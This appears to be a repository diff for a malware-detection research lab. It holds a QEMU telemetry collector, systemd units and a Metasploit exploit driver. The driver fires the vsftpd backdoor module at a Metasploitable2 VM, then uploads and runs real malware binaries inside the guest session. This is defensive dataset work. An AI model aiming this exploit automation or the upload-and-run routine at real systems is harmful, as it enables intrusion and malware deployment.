out = self.execute("human-monitor-command", **{"command-line": cmd})
return out if isinstance(out, str) else ""
def close(self) -> None:
if self._sock is not None:
try:
self._sock.close()
except OSError:
pass
self._sock = None
self._reader = None
# ---- row builders ----------------------------------------------------------
def _flatten_blockstats(blockstats: list[dict] | None) -> dict[str, dict[str, int]]:
"""Compact ``query-blockstats`` to ``{device: {rd_ops, wr_ops, ...}}``."""
out: dict[str, dict[str, int]] = {}
for entry in blockstats or []:
name = entry.get("device") or entry.get("qdev") or "unknown"
s = entry.get("stats") or {}
out[name] = {
"rd_ops": int(s.get("rd_operations", 0)),
"wr_ops": int(s.get("wr_operations", 0)),
"rd_bytes": int(s.get("rd_bytes", 0)),
"wr_bytes": int(s.get("wr_bytes", 0)),
"flush_ops": int(s.get("flush_operations", 0)),
}
return out
def collect_once(client: QMPClient, t_mono_origin_ns: int) -> dict[str, Any]:
row: dict[str, Any] = {
"t_mono_ns": time.monotonic_ns() - t_mono_origin_ns,
"t_wall_ns": time.time_ns(),
"source": SOURCE,
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
}
# query-status is dirt cheap and tells us whether the guest is
# paused (rare) or running.
try:
status = client.execute("query-status")
row["vm_status"] = status.get("status")
row["vm_running"] = bool(status.get("running"))
except QMPError as e:
log.debug("query-status failed: %s", e)
try:
bs = client.execute("query-blockstats")
row["blockstats"] = _flatten_blockstats(bs)
except QMPError as e:
log.debug("query-blockstats failed: %s", e)
# query-stats is QEMU 7.1+ and the schema varies across versions.
# We only ask for KVM stats and tolerate any subset of fields.
try:
stats = client.execute("query-stats", target="vm")
row["kvm_stats"] = _summarize_query_stats(stats)
except QMPError as e:
log.debug("query-stats not supported: %s", e)
return row
def _summarize_query_stats(stats_resp: list[dict] | dict) -> dict[str, int]:
"""Reduce ``query-stats`` to a flat name→value map of integer
counters. The full payload is verbose and version-specific; we only
ever want individual scalar counters downstream."""
flat: dict[str, int] = {}
items = stats_resp if isinstance(stats_resp, list) else [stats_resp]
for entry in items:
for s in entry.get("stats", []) or []:
name = s.get("name")
value = s.get("value")
if isinstance(name, str) and isinstance(value, int):
flat[name] = value
return flat
# ---- run loop --------------------------------------------------------------
def run_loop(
socket_path: str | Path,
output_path: Path,
t_mono_origin_ns: int,
interval_ms: int,
stop_event: threading.Event,
) -> int:
"""Connect to ``socket_path`` and sample at ``interval_ms`` until
``stop_event``. Returns the number of rows written.
A single missed sample (transient QMP error) is logged and skipped;
repeated failures terminate the loop so the episode finishes cleanly
rather than hanging on a dead hypervisor."""
interval_ns = interval_ms * 1_000_000
client = QMPClient(socket_path)
try:
client.connect(timeout_s=5.0)
except (OSError, QMPError) as e:
log.warning("QMP connect to %s failed: %s — collector exits cleanly", socket_path, e)
return 0
rows = 0
consecutive_failures = 0
next_tick = time.monotonic_ns()
output_path.parent.mkdir(parents=True, exist_ok=True)
try:
with output_path.open("a", buffering=1) as f:
while not stop_event.is_set():
try:
row = collect_once(client, t_mono_origin_ns)
f.write(json.dumps(row) + "\n")
rows += 1
consecutive_failures = 0
except (QMPError, OSError) as e:
consecutive_failures += 1
log.warning("QMP sample %d failed: %s", rows, e)
if consecutive_failures >= 5:
log.warning("5 consecutive QMP failures; bailing")
break
next_tick += interval_ns
sleep_ns = next_tick - time.monotonic_ns()
if sleep_ns > 0:
stop_event.wait(sleep_ns / 1_000_000_000)
else:
next_tick = time.monotonic_ns()
finally:
client.close()
return rows
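
The handshake and the "drain async events until the reply" rule can be tried in-process against a stand-in server over `socket.socketpair()`. This is a sketch, not the collector's client: `fake_qmp_server`, `call` and `demo` are hypothetical names, and the fake server's messages are reduced to the keys the client inspects (a real QEMU greeting and real events carry more fields).

```python
import json
import socket
import threading


def _send(f, obj: dict) -> None:
    f.write((json.dumps(obj) + "\n").encode("utf-8"))
    f.flush()


def _recv(f) -> dict:
    line = f.readline()
    if not line:
        raise ConnectionError("peer closed the connection")
    return json.loads(line)


def fake_qmp_server(conn: socket.socket) -> None:
    """Stand-in for QEMU: greeting, capabilities ack, one event, one reply."""
    with conn, conn.makefile("rwb") as f:
        _send(f, {"QMP": {"version": {}, "capabilities": []}})
        _recv(f)                       # {"execute": "qmp_capabilities"}
        _send(f, {"return": {}})
        _recv(f)                       # {"execute": "query-status"}
        _send(f, {"event": "RESUME"})  # async event ahead of the reply
        _send(f, {"return": {"status": "running", "running": True}})


def call(f, command: str) -> dict:
    _send(f, {"execute": command})
    while True:
        msg = _recv(f)
        if "return" in msg:
            return msg["return"]
        if "error" in msg:
            raise RuntimeError(f"{command}: {msg['error']}")
        # Anything else is an async event: skip it and keep reading.


def demo() -> dict:
    client, server = socket.socketpair()
    t = threading.Thread(target=fake_qmp_server, args=(server,))
    t.start()
    with client, client.makefile("rwb") as f:
        if "QMP" not in _recv(f):
            raise RuntimeError("unexpected greeting")
        call(f, "qmp_capabilities")
        status = call(f, "query-status")
    t.join()
    return status


if __name__ == "__main__":
    print(demo())
```

Unlike `QMPClient.execute`, the loop in `call` is unbounded; the collector's 64-message cap is the safer choice against a misbehaving peer.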


@ -171,6 +171,10 @@ thing plays in our pipeline.
- **pycdlib** — pure-Python ISO9660/Joliet/Rock Ridge builder. Used to
produce the NoCloud cidata ISO without depending on system mkisofs/
xorriso. https://clalancette.github.io/pycdlib/
- **msgpack** — binary serialization used by Metasploit's RPC API. The
Tier-3 driver speaks msfrpcd's native msgpack-over-HTTPS so we don't
pull in a higher-level Metasploit Python client.
https://msgpack.org
---

etc/caddy-root.crt Normal file

@ -0,0 +1,11 @@
-----BEGIN CERTIFICATE-----
MIIBpDCCAUqgAwIBAgIRAP15YNZS/guq4ES7RfuBBQQwCgYIKoZIzj0EAwIwMDEu
MCwGA1UEAxMlQ2FkZHkgTG9jYWwgQXV0aG9yaXR5IC0gMjAyNiBFQ0MgUm9vdDAe
Fw0yNjA0MjYxMzE5NTZaFw0zNjAzMDQxMzE5NTZaMDAxLjAsBgNVBAMTJUNhZGR5
IExvY2FsIEF1dGhvcml0eSAtIDIwMjYgRUNDIFJvb3QwWTATBgcqhkjOPQIBBggq
hkjOPQMBBwNCAASjU+sJ+rLPPtTK5t7MsKa6/WDknumPOgxy7uGwGATkd65cHTjz
zTH6+0+uJ7LPZFTJoPSB5WVHrEA0veY8AxH5o0UwQzAOBgNVHQ8BAf8EBAMCAQYw
EgYDVR0TAQH/BAgwBgEB/wIBATAdBgNVHQ4EFgQU8EarYtjVc2EvpYE6OPhDQlYB
docwCgYIKoZIzj0EAwIDSAAwRQIhANxALV9oKSAC4JEB/w1EctnzMfzLyueBpGoB
7p5I07LRAiAKQuhNMeTDSK3Qql+IjunH8UPidETNXfyInwMnbzgAaQ==
-----END CERTIFICATE-----


@ -0,0 +1,44 @@
[Unit]
Description=CIS490 mTLS bootstrap endpoint (auto-issue client certs to enrolled lab hosts)
Documentation=https://maxgit.wg/spectral/CIS490
After=network-online.target
Wants=network-online.target
[Service]
Type=simple
# Runs as root because the wg-pki CA private key is root-only. The
# service shells out to issue-cis490-client-cert.sh per mint and
# never touches anything else under /var/lib.
User=root
Group=root
WorkingDirectory=/opt/cis490
ExecStart=/opt/cis490/.venv/bin/python -m bootstrap \
--listen-host 127.0.0.1 \
--listen-port 8446 \
--issuer-script /opt/wg-pki/scripts/issue-cis490-client-cert-wrapper.sh \
--issued-root /var/lib/wg-pki/issued
Restart=on-failure
RestartSec=5
# Hardening — narrower than receiver because this binary's only job
# is to call openssl + tar via the issuer script, then serve files.
NoNewPrivileges=true
PrivateTmp=true
ProtectSystem=strict
# /home/max/.env/wg-pki/scripts/ holds the issuer script the wrapper
# exec's. ProtectHome={read-only,tmpfs} both *hide* /home contents
# instead of restricting them to read-only — so we leave /home
# accessible. ProtectSystem=strict still keeps everything outside
# /var/lib/wg-pki write-protected.
ProtectHome=no
ReadWritePaths=/var/lib/wg-pki
ProtectKernelTunables=true
ProtectKernelModules=true
ProtectControlGroups=true
LockPersonality=true
RestrictNamespaces=true
RestrictRealtime=true
SystemCallArchitectures=native
[Install]
WantedBy=multi-user.target


@ -1,33 +1,46 @@
[Unit]
Description=CIS490 episode campaign runner
Description=CIS490 lab-host episode orchestrator (fleet mode)
Documentation=https://maxgit.wg/spectral/CIS490
After=network-online.target
# Episodes need KVM. msfrpcd (for Tier 3+) is brought up out-of-band
# by cis490-msfrpcd.service when installed.
After=network-online.target wg-quick@wg0.service
Wants=network-online.target
[Service]
Type=simple
User=cis490
Group=cis490
SupplementaryGroups=kvm
WorkingDirectory=/opt/cis490
ExecStart=/opt/cis490/.venv/bin/python tools/run_campaign.py \
# /etc/cis490/lab-host.env is written by scripts/install-lab-host.sh;
# carries FLEET_HOST_ID, BRIDGE, and any operator-supplied overrides.
EnvironmentFile=/etc/cis490/lab-host.env
# Fleet mode: detect host capacity, run that many concurrent episodes
# per wave with samples drawn from the manifest. Each invocation runs
# one wave and exits; systemd respawns per Restart= below, giving us
# a continuous stream of fresh-sample episodes per host. The shipper
# picks them up as `done.marker` files appear.
ExecStart=/opt/cis490/.venv/bin/python /opt/cis490/tools/run_fleet.py \
--data-root /var/lib/cis490/data \
--target 100
Restart=on-failure
RestartSec=10
--manifest /opt/cis490/samples/manifest.toml \
--waves 1
Restart=always
RestartSec=15
# Hardening
NoNewPrivileges=true
PrivateTmp=false
# Hardening — explicitly grant CAP_NET_RAW for tcpdump (source 4) and
# CAP_SYS_ADMIN / CAP_PERFMON for perf (source 3) when the operator
# enables those. Both are inherited by per-episode subprocesses.
# NoNewPrivileges=false is required because AmbientCapabilities only
# survives across exec() if NNP is off.
NoNewPrivileges=false
PrivateTmp=true
ProtectSystem=strict
ProtectHome=true
ReadWritePaths=/var/lib/cis490 /tmp/cis490-vm /dev/kvm
ProtectKernelTunables=true
ProtectKernelModules=true
ProtectControlGroups=true
LockPersonality=true
RestrictRealtime=true
SystemCallArchitectures=native
# /tmp is needed for per-slot RUN_DIR (cis490-vm-fleet-<slot>) — the
# fleet runner stages QEMU's sockets + pidfile there.
ReadWritePaths=/var/lib/cis490 /tmp
SupplementaryGroups=kvm
AmbientCapabilities=CAP_NET_RAW CAP_NET_ADMIN CAP_SYS_ADMIN CAP_PERFMON
CapabilityBoundingSet=CAP_NET_RAW CAP_NET_ADMIN CAP_SYS_ADMIN CAP_PERFMON CAP_DAC_READ_SEARCH
[Install]
WantedBy=multi-user.target


@ -1,23 +1,19 @@
[Unit]
Description=CIS490 episode shipper
Description=CIS490 lab-host episode shipper
Documentation=https://maxgit.wg/spectral/CIS490
After=network-online.target cis490-orchestrator.service
# WG must be up before the shipper can reach the receiver.
After=network-online.target wg-quick@wg0.service
Wants=network-online.target
Requires=wg-quick@wg0.service
[Service]
Type=simple
User=cis490
Group=cis490
WorkingDirectory=/opt/cis490
ExecStart=/opt/cis490/.venv/bin/python tools/shipper.py \
--data-root /var/lib/cis490/data \
--receiver-url https://collector.wg \
--host-id lab-host-1 \
--ca-bundle /etc/cis490/certs/wg-ca.pem \
--client-cert /etc/cis490/certs/lab-host-1.pem \
--client-key /etc/cis490/certs/lab-host-1.key
ExecStart=/opt/cis490/.venv/bin/python -m shipper --config /etc/cis490/lab-host.toml
Restart=on-failure
RestartSec=10
RestartSec=5
# Hardening
NoNewPrivileges=true
@ -29,6 +25,7 @@ ProtectKernelTunables=true
ProtectKernelModules=true
ProtectControlGroups=true
LockPersonality=true
RestrictNamespaces=true
RestrictRealtime=true
SystemCallArchitectures=native

50
etc/lab-host.toml.example Normal file

@ -0,0 +1,50 @@
# CIS490 lab-host — copy to /etc/cis490/lab-host.toml and edit.
#
# This config drives BOTH the orchestrator (which runs episodes) and
# the shipper (which uploads completed episodes to the central
# receiver over WG).
# Stable identity for this lab host. Used in the receiver path
# (/v1/episodes/<host_id>/...) and in the X-Lab-Host header. Pick
# something short, stable, and DNS-safe — letters, digits, _.- only.
host_id = "REPLACE_ME"
[paths]
data_root = "/var/lib/cis490/data"
samples_store = "/var/lib/cis490/samples/store"
qcow_image = "/var/lib/cis490/vm/images/metasploitable2.qcow2"
[receiver]
# The receiver lives behind Caddy on the WG-side collector host. The
# hostname must resolve over WG (collector.wg in the canonical
# spectral lab). The wg-pki CA must be on every lab-host so the
# Caddy-issued internal cert validates.
url = "https://collector.wg"
ca_bundle = "/etc/cis490/certs/wg-ca.pem"
# mTLS: leaf cert + private key issued by wg-pki for THIS host_id.
# Comment these out to fall back to bearer-token auth during early
# bring-up.
client_cert = "/etc/cis490/certs/lab-host.pem"
client_key = "/etc/cis490/certs/lab-host.key"
# Bearer is optional and only used if mTLS isn't yet configured. When
# both are set, mTLS does the actual authn and the bearer is a
# belt-and-suspenders check.
# bearer_token = "REPLACE_ME_WITH_SECRET"
# Set to false ONLY for local-loopback dev against an unsigned cert.
# verify_tls = true
[shipper]
scan_interval_s = 5.0
request_timeout_s = 60.0
[episode]
baseline_seconds = 30
infected_seconds = 90
dormant_seconds = 60
[retention]
keep_local_for_days = 7
prune_at_disk_pct = 80


@ -1,6 +1,6 @@
# CIS490 receiver — copy to /etc/cis490/receiver.toml and edit.
listen_addr = "127.0.0.1:8443"
listen_addr = "127.0.0.1:8444"
store_root = "/var/lib/cis490/episodes"
incoming_root = "/var/lib/cis490/incoming"
index_path = "/var/lib/cis490/index.jsonl"


@ -1,12 +1,92 @@
# exploits/
Metasploit resource scripts (`*.rc`) that drive specific exploit modules
deterministically — same inputs, same module options, every time.
The Tier-3 exploit driver — fires a Metasploit module against a
vulnerable target VM, watches for the resulting session, and stamps the
session-open transition into the episode's `events.jsonl` so the
labeler can mark `armed → infecting` honestly.
Each script:
- Sets `RHOSTS` to the guest's bridge IP.
- Sets a payload that opens a session usable for sample upload + execute.
- Avoids any options that introduce randomness in the exploit fire timing
(so that the `armed → infecting` transition lands at a predictable offset).
## Layout
These scripts pair with public Metasploit modules. We do not author exploits.
```
exploits/
msfrpc.py tiny msgpack-over-HTTPS client for msfrpcd
driver.py MSFExploitDriver — plugged in as EpisodeRunner.on_phase
modules.py ModuleConfig + TOML loader
modules/
vsftpd_234_backdoor.toml first canned module (Metasploitable2)
...
```
## Module configs
Each `modules/*.toml` describes one Metasploit module — its path, the
options to set, and the payload to use. The driver reads these files
to drive `module.execute` over msfrpc.
```toml
description = "..."
[module]
type = "exploit" # exploit | auxiliary | post
path = "unix/ftp/vsftpd_234_backdoor"
[module.options]
RHOSTS = "{{ target_ip }}" # placeholder substituted at runtime
RPORT = 21
[payload]
path = "cmd/unix/interact"
[payload.options] # optional
# LHOST = "{{ target_ip }}"
[session]
type = "shell"
```
The only placeholder supported today is `{{ target_ip }}`. Add more in
`exploits/modules.py::ModuleConfig.render_options` when needed.
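
A minimal sketch of the substitution, assuming the behaviour described above: only string values are touched, and both the `{{ target_ip }}` and `{{target_ip}}` spellings are accepted. The function name `render` and the sample IP are illustrative; this is not the project's `render_options` itself.

```python
from typing import Any


def render(options: dict[str, Any], *, target_ip: str) -> dict[str, Any]:
    """Replace the target_ip placeholder in string values; copy the rest."""
    out: dict[str, Any] = {}
    for key, value in options.items():
        if isinstance(value, str):
            value = (
                value.replace("{{ target_ip }}", target_ip)
                .replace("{{target_ip}}", target_ip)
            )
        out[key] = value
    return out


rendered = render({"RHOSTS": "{{ target_ip }}", "RPORT": 21}, target_ip="10.0.2.15")
print(rendered)
```

Non-string values such as `RPORT = 21` pass through unchanged, so integer options keep their TOML type.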
## Running
```sh
# 1. Start msfrpcd locally:
msfrpcd -P <password> -U msf -a 127.0.0.1 -p 55553
# 2. Drop a vulnerable target image at vm/images/<name>.qcow2 (e.g.
# Metasploitable2 — see docs/sources.md for sha256).
# 3. Drive an episode:
MSFRPC_PASSWORD=<password> uv run python tools/run_tier3_demo.py \
--module vsftpd_234_backdoor \
--target-port 21 \
--data-root data
```
The episode's `events.jsonl` will contain:
```
driver_setup — module + target snapshotted before fire
exploit_fire — module.execute issued
session_open — new session id observed in session.list
session_landing_probe — first command response (id) recorded
sample_executed — workload kicked off inside the session
session_dormant — workload killed
session_killed — session.stop at episode end
```
These pair with the standard phase labels in `labels.jsonl` so a
downstream loader can reconcile "what the orchestrator scheduled"
against "what actually happened on the wire".
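
As a rough illustration of that reconciliation, the sketch below lists which of the expected driver events never appeared in an episode. The JSON field name `event` is an assumption made for this example (the real schema lives in `docs/data-model.md`), and both helper functions are hypothetical.

```python
import json

EXPECTED_ORDER = [
    "driver_setup", "exploit_fire", "session_open",
    "session_landing_probe", "sample_executed",
    "session_dormant", "session_killed",
]


def event_names(jsonl_text: str, key: str = "event") -> list[str]:
    """Return the event name from each non-empty JSONL line.

    The field name `event` is assumed, not taken from the documented schema.
    """
    names = []
    for line in jsonl_text.splitlines():
        if line.strip():
            names.append(json.loads(line)[key])
    return names


def missing_events(names: list[str]) -> list[str]:
    """Expected events that never appeared, e.g. after a session-open timeout."""
    seen = set(names)
    return [name for name in EXPECTED_ORDER if name not in seen]


# Simulate an episode where the exploit fired but no session ever opened.
sample = "\n".join(json.dumps({"event": n}) for n in EXPECTED_ORDER[:2])
print(missing_events(event_names(sample)))
```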
## Adding a module
1. Drop a TOML at `exploits/modules/<name>.toml` per the schema above.
2. Pick a payload that works without a callback channel until the
`br-malware` bridge is in (see `vm/launch_target.sh` — SLIRP +
`restrict=on` blocks reverse-tcp by design). `cmd/unix/interact`
and other "session on the same socket" payloads are safe.
3. Drive a quick check: `uv run python tools/run_tier3_demo.py --module <name>`.
4. The new module is automatically picked up by `tools/run_tier3_demo.py`
via `--module <name>`; no driver code changes needed.
We do **not** author exploits or modify upstream Metasploit code. The
driver is a pure adapter from the project's phase machine to msfrpc.

0
exploits/__init__.py Normal file

338
exploits/driver.py Normal file

@ -0,0 +1,338 @@
"""Tier-3 exploit driver.
Plugged into ``EpisodeRunner`` as the ``on_phase`` callback. Translates
the closed phase enum into msfrpc actions:
    clean             idle. (no-op; exploit hasn't fired yet)
    armed             module loaded + options applied; module fires
                      with ``module.execute``. Driver records the fire
                      timestamp via ``emit_event`` so the labeler can
                      align ``armed`` with what's actually happening.
    infecting         poll for a new session; on session_open, run a
                      one-shot landing command (``id`` or similar) so
                      we have a clear "session is responsive" event.
    infected_running  start observable workload inside the session.
    dormant           kill the workload, leave the session alive.
    reverting         kill session, snapshot revert handled by caller.
The events the driver writes match the schema in ``docs/data-model.md``:
``exploit_fire``, ``session_open``, ``sample_executed``, ``session_dormant``,
``session_killed``.
The driver does NOT author exploits or pick payloads at runtime; those
choices live in ``exploits/modules/*.toml``. The driver is a pure
adapter between the phase machine and msfrpc.
"""
from __future__ import annotations
import logging
import time
from dataclasses import dataclass
from typing import Callable
from pathlib import Path
from samples.manifest import Sample
from .modules import ModuleConfig
from .msfrpc import MSFRpcClient, wait_for_new_session
from .workloads import (
ChunkedUpload, Workload, chunked_real_binary_upload,
real_binary_workload, workload_for,
)
log = logging.getLogger("cis490.exploits.driver")
EmitEvent = Callable[..., None]
@dataclass
class DriverConfig:
target_ip: str
session_open_timeout_s: float = 30.0
# Driver v1 fallback workload — used only when no Sample is passed
# in (Sample-driven runs override these via exploits.workloads).
# We keep the v1 path so existing callers keep working unchanged.
workload_cmd: str = "yes > /dev/null"
workload_kill_cmd: str = "pkill yes; true"
# Where staged real-malware binaries live on the lab host.
sample_store_root: Path | None = None
class MSFExploitDriver:
"""Phase-to-msfrpc adapter. One instance per episode.
When constructed with a ``Sample``, the driver dispatches the
``infected_running`` / ``dormant`` workload through
``exploits.workloads`` so the in-session behaviour matches the
sample's profile (cpu-saturate, scan-and-dial, io-walk, bursty-c2,
low-and-slow, shell-resident). Without a sample, falls back to
the v1 single-command workload, which is useful for the very first
Tier-3 smoke runs."""
def __init__(
self,
client: MSFRpcClient,
module: ModuleConfig,
cfg: DriverConfig,
emit_event: EmitEvent,
*,
sample: Sample | None = None,
) -> None:
self.client = client
self.module = module
self.cfg = cfg
self.emit = emit_event
self.sample = sample
# Chunked upload plan (None unless real binary path applies).
self._chunked: ChunkedUpload | None = None
self.workload: Workload | None = self._resolve_workload(sample)
self._sessions_seen_at_arm: set[int] = set()
self._session_id: int | None = None
self._job_id: int | str | None = None
self._fired = False
def _resolve_workload(self, sample: Sample | None) -> Workload | None:
"""Pick the best workload for this sample:
1. real binary (if staged at samples/store/<sha256>) → chunked
   upload + exec via dedicated dispatch path
2. profile mimic from exploits.workloads
3. None → driver v1 fallback (yes-loop)
"""
if sample is None:
return None
if sample.kind == "real" and self.cfg.sample_store_root is not None:
bin_path = sample.binary_path(self.cfg.sample_store_root)
if bin_path is not None:
try:
payload = bin_path.read_bytes()
self._chunked = chunked_real_binary_upload(payload, sample=sample)
# Return a Workload shell so the rest of the driver
# can treat the dispatch uniformly. start_cmd is
# never sent verbatim — _start_workload walks the
# chunked plan instead.
return Workload(
profile=self._chunked.profile,
start_cmd="(chunked-upload-managed-by-driver)",
stop_cmd=self._chunked.stop_cmd,
description=f"Real binary chunked upload+execute "
f"({len(payload)} bytes, "
f"{self._chunked.n_chunks} chunks)",
)
except OSError as e:
log.warning("could not read real sample %s: %s; falling back", bin_path, e)
return workload_for(sample)
# ---- lifecycle ------------------------------------------------------
def setup(self) -> None:
"""Authenticate and snapshot the pre-existing session set so we
can recognize a *new* session as the one we just opened."""
self.client.login()
self._sessions_seen_at_arm = set(self.client.session_list().keys())
self.emit(
"driver_setup",
module=self.module.module_path,
payload=self.module.payload_path,
target_ip=self.cfg.target_ip,
preexisting_sessions=sorted(self._sessions_seen_at_arm),
sample=self.sample.name if self.sample else None,
sample_kind=self.sample.kind if self.sample else None,
sample_sha256=self.sample.sha256 if self.sample else None,
workload_profile=self.workload.profile if self.workload else None,
)
def teardown(self) -> None:
if self._session_id is not None:
try:
self.client.session_stop(self._session_id)
self.emit("session_killed", session_id=self._session_id)
except Exception:
log.exception("session.stop on %s", self._session_id)
if self._job_id is not None:
try:
self.client.job_stop(self._job_id)
except Exception:
log.debug("job.stop on %s (often already gone)", self._job_id)
self.client.logout()
# ---- phase callback -------------------------------------------------
def set_phase(self, phase: str) -> None:
log.info("driver phase -> %s", phase)
if phase == "clean":
return
if phase == "armed":
self._fire()
elif phase == "infecting":
self._await_session()
elif phase == "infected_running":
self._start_workload()
elif phase == "dormant":
self._stop_workload()
elif phase == "reverting":
self.teardown()
else:
log.warning("unknown phase: %s", phase)
# ---- actions --------------------------------------------------------
def _fire(self) -> None:
if self._fired:
log.debug("module already fired; skipping re-fire")
return
opts = self.module.render_options(target_ip=self.cfg.target_ip)
self.emit(
"exploit_fire",
module=self.module.module_path,
options={k: v for k, v in opts.items() if k != "PASSWORD"},
)
resp = self.client.module_execute(
self.module.module_type, self.module.module_path, opts,
)
self._job_id = resp.get("job_id")
self._fired = True
def _await_session(self) -> None:
if self._session_id is not None:
return
result = wait_for_new_session(
self.client,
seen=self._sessions_seen_at_arm,
timeout_s=self.cfg.session_open_timeout_s,
)
if result is None:
self.emit(
"session_open_timeout",
module=self.module.module_path,
timeout_s=self.cfg.session_open_timeout_s,
)
log.warning(
"no session opened within %.1fs", self.cfg.session_open_timeout_s,
)
return
sid, info = result
self._session_id = sid
self.emit(
"session_open",
session_id=sid,
session_type=info.get("type"),
tunnel_peer=info.get("tunnel_peer"),
)
# Landing probe so we have a known-good RTT marker on the wire.
try:
self.client.session_shell_write(sid, "id")
time.sleep(0.5)
out = self.client.session_shell_read(sid)
self.emit("session_landing_probe", session_id=sid, output=out.strip()[:256])
except Exception:
log.exception("landing probe on session %s", sid)
def _start_workload(self) -> None:
if self._session_id is None:
log.warning("infected_running with no session — skipping workload")
return
if self._chunked is not None:
self._upload_real_binary_chunked()
return
if self.workload is not None:
# Driver v2 — profile-matched mimic workload.
self.client.session_shell_write(self._session_id, self.workload.start_cmd)
self.emit(
"sample_executed",
session_id=self._session_id,
profile=self.workload.profile,
description=self.workload.description,
sample=self.sample.name if self.sample else None,
)
else:
# Driver v1 fallback.
self.client.session_shell_write(
self._session_id,
f"nohup sh -c {_shquote(self.cfg.workload_cmd)} </dev/null "
f">/dev/null 2>&1 & disown",
)
self.emit(
"sample_executed",
session_id=self._session_id,
command=self.cfg.workload_cmd,
)
def _upload_real_binary_chunked(self) -> None:
"""Walk the ChunkedUpload plan: each chunk is a separate
shell_write so msfrpc never sees a buffer-busting payload.
Verifies the in-guest sha256 before exec; emits per-step
events so we have a wire-level audit trail of Tier-4 runs."""
plan = self._chunked
assert plan is not None and self._session_id is not None
sid = self._session_id
self.emit(
"real_binary_upload_begin",
session_id=sid,
n_chunks=plan.n_chunks,
sha256=plan.expected_sha256,
sample=self.sample.name if self.sample else None,
)
for i, chunk in enumerate(plan.chunks):
self.client.session_shell_write(sid, chunk)
# Read back so the next write doesn't race ahead of the
# previous one's prompt return. We don't parse it.
try:
self.client.session_shell_read(sid)
except Exception:
pass
# Decode + verify on the guest side.
self.client.session_shell_write(sid, plan.finalize_cmd)
try:
verify_out = self.client.session_shell_read(sid)
except Exception:
verify_out = ""
verified = "sha-ok" in verify_out
self.emit(
"real_binary_verify",
session_id=sid,
ok=verified,
output=verify_out.strip()[:256],
sha256=plan.expected_sha256,
)
if not verified:
self.emit("real_binary_aborted", session_id=sid, reason="sha mismatch")
return
# Launch.
self.client.session_shell_write(sid, plan.exec_cmd)
self.emit(
"sample_executed",
session_id=sid,
profile=plan.profile,
sample=self.sample.name if self.sample else None,
sha256=plan.expected_sha256,
kind="real",
)
def _stop_workload(self) -> None:
if self._session_id is None:
return
if self.workload is not None:
self.client.session_shell_write(self._session_id, self.workload.stop_cmd)
else:
self.client.session_shell_write(
self._session_id, self.cfg.workload_kill_cmd,
)
self.emit(
"session_dormant",
session_id=self._session_id,
profile=self.workload.profile if self.workload else None,
)
def _shquote(s: str) -> str:
# Minimal POSIX single-quote escaping. The workload command is set
# by us, not by anything user-controlled, so we just need to handle
# embedded single quotes correctly for completeness.
return "'" + s.replace("'", "'\\''") + "'"
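
The quoting helper above can be checked against the standard library. This sketch re-declares the same escaping under the hypothetical name `shquote` and confirms that `shlex.split` recovers the original command as a single argument, as it does for `shlex.quote`. The sample command is made up for the test.

```python
import shlex


def shquote(s: str) -> str:
    """POSIX single-quote escaping: close the quote, emit \\', reopen it."""
    return "'" + s.replace("'", "'\\''") + "'"


cmd = "echo it's done > /dev/null"
quoted = shquote(cmd)

# Both quoting styles should split back to the original string, unchanged.
roundtrip_ours = shlex.split(quoted) == [cmd]
roundtrip_stdlib = shlex.split(shlex.quote(cmd)) == [cmd]
print(roundtrip_ours, roundtrip_stdlib)
```

`shlex.quote` would be a drop-in alternative here; the hand-rolled version simply avoids an extra import for a single call site.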

147
exploits/modules.py Normal file

@ -0,0 +1,147 @@
"""TOML loader for exploit-module configs.
Each ``exploits/modules/*.toml`` describes one Metasploit module: its
path, the options to set, the payload to use, and how the driver
should treat the resulting session. The driver consumes ``ModuleConfig``
objects; the TOML files are the on-disk source of truth.
Why TOML and not msfconsole ``.rc`` scripts? ``.rc`` scripts are
imperative and assume an interactive console; the driver needs the
*structured* options to push them through msfrpc. TOML is the simplest
way to express a small typed map of options and it round-trips
cleanly into ``meta.json`` for episode reproducibility.
Per-(host, slot, episode) selection mirrors the sample-manifest
selector: we want different vulnerabilities exercised across hosts
and waves so the trained model sees a diverse corpus of
``armed → infecting`` transition shapes, not just the same FTP
backdoor every run.
"""
from __future__ import annotations
import hashlib
import tomllib
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any
_VALID_MODULE_TYPES = {"exploit", "auxiliary", "post"}
@dataclass(frozen=True)
class ModuleConfig:
name: str # short id, e.g. "vsftpd_234_backdoor"
module_type: str # "exploit" | "auxiliary" | "post"
module_path: str # e.g. "unix/ftp/vsftpd_234_backdoor"
options: dict[str, Any] = field(default_factory=dict)
payload_path: str | None = None # e.g. "cmd/unix/interact"
payload_options: dict[str, Any] = field(default_factory=dict)
expected_session_type: str = "shell" # what we'll get on success
description: str = ""
# When true the module's payload uses a callback channel (reverse
# or bind shell) and won't land a session under SLIRP+restrict=on.
# The fleet runner skips these unless BRIDGE is set so episodes
# that fire them actually produce data.
requires_bridge: bool = False
def render_options(self, *, target_ip: str) -> dict[str, Any]:
"""Substitute ``{{ target_ip }}`` placeholders in options.
Module configs use Jinja-style placeholders for any value that
isn't known until episode time (RHOSTS, LHOST, etc.). Today the
only supported placeholder is ``target_ip``; if more are needed
later, generalize here."""
out: dict[str, Any] = {}
for k, v in self.options.items():
if isinstance(v, str) and "{{" in v:
out[k] = (
v.replace("{{ target_ip }}", target_ip)
.replace("{{target_ip}}", target_ip)
)
else:
out[k] = v
# MSF requires PAYLOAD as a top-level option even though we
# carry it in a separate field on the config.
if self.payload_path:
out["PAYLOAD"] = self.payload_path
for k, v in self.payload_options.items():
if isinstance(v, str) and "{{" in v:
v = (
v.replace("{{ target_ip }}", target_ip)
.replace("{{target_ip}}", target_ip)
)
out[k] = v
return out
def load_module_config(path: Path) -> ModuleConfig:
raw = tomllib.loads(path.read_text())
mod = raw.get("module") or {}
module_path = mod.get("path")
module_type = mod.get("type", "exploit")
if not isinstance(module_path, str) or not module_path:
raise ValueError(f"{path}: module.path must be a non-empty string")
if module_type not in _VALID_MODULE_TYPES:
raise ValueError(
f"{path}: module.type {module_type!r} not in {_VALID_MODULE_TYPES}"
)
options = (raw.get("module", {}).get("options") or {}) | (raw.get("options") or {})
payload = raw.get("payload") or {}
return ModuleConfig(
name=path.stem,
module_type=module_type,
module_path=module_path,
options=dict(options),
payload_path=payload.get("path"),
payload_options=dict(payload.get("options") or {}),
expected_session_type=raw.get("session", {}).get("type", "shell"),
description=raw.get("description", ""),
requires_bridge=bool(raw.get("runtime", {}).get("requires_bridge", False)),
)
def load_module_configs(directory: Path) -> dict[str, ModuleConfig]:
"""Load every ``*.toml`` under ``directory``, keyed by short name."""
return {
p.stem: load_module_config(p)
